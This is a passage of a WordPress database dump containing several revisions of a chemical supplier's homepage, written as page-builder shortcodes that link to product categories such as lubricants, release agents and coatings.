link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:04:52', '2017-05-27 09:04:52', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4296, 1, '2017-05-27 09:09:07', '2017-05-27 09:09:07', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:09:07', '2017-05-27 09:09:07', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4297, 1, '2017-05-27 09:52:17', '2017-05-27 09:52:17', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built release agent, specialty coating or unique formulation.  Our engineering department can design a solution for your application needs.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" width="100%" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-autosave-v1', '', '', '2017-05-27 09:52:17', '2017-05-27 09:52:17', '', 64, 'https://www.miller-stephenson.com/64-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4298, 1, '2017-05-27 09:19:48', '2017-05-27 09:19:48', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0" text-align="right"]\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:19:48', '2017-05-27 09:19:48', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4299, 1, '2017-05-27 09:42:46', '2017-05-27 09:42:46', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" 